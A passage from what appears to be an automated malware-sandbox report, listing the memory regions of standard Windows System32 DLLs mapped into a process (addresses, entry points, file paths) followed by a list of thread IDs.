end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6970 start_va = 0x7ffc54440000 end_va = 0x7ffc544d7fff entry_point = 0x7ffc54440000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 6971 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6972 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6973 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6974 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6975 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6976 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6977 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6978 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6979 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6980 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6981 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6982 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6983 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6984 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6985 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6986 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6987 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6988 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6989 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 149 os_tid = 0x834 Thread: id = 150 os_tid = 0x760 Thread: id = 151 os_tid = 0x6f4 Thread: id = 152 os_tid = 0x6c8 Thread: id = 153 os_tid = 0x6c4 Thread: id = 154 os_tid = 0x6c0 Thread: id = 155 os_tid = 0x6bc Thread: id = 156 os_tid = 0x690 Thread: id = 157 os_tid = 0x584 Thread: id = 158 os_tid = 0x544 Thread: id = 159 os_tid = 0x540 Thread: id = 160 os_tid = 0x514 Thread: id = 161 os_tid = 0x190 Thread: id = 162 os_tid = 0x1a0 Thread: id = 163 os_tid = 0x118 Thread: id = 164 os_tid = 0x3f4 Thread: id = 165 os_tid = 0x39c Thread: id = 188 os_tid = 0xb74 Thread: id = 191 os_tid = 0x580